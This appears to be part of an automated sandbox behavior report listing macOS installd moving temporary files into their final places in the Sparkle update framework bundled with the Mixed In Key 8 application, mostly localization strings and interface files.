              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_KAkpKu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_55J9V0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_cOYvui -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_2ldMBX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_urUoft -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_MHky8h -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_VVSkgU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_ze62VW -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_UDU7Hf -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_5LUenu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_VztrS8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_pRrWQ5 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_SoSl6E -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_pu3GrG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_HH4DNv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_jaDfyd -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_aZZdDV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_jtiGA8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_l9nSYK -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_qD4AZ7 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_ykJSdy -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_Ijn8ig -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_dUl3d9 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_CiiwuN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_3KjTkj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_RNSAmT -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_MmMoXX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_1X4LKC -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/.BC.T_xiSlDN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/CodeResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/.BC.T_vXsmAf -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/AutoupdateJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/de.lproj/.BC.T_OwXvVk -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/de.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/he.lproj/.BC.T_QRKIQS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/he.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ar.lproj/.BC.T_wI0lKP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ar.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/el.lproj/.BC.T_CcHNCX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/el.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ja.lproj/.BC.T_M62Uxz -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ja.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/en.lproj/.BC.T_lqgdUf -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/en.lproj/Sparkle.stringsJump to behavior
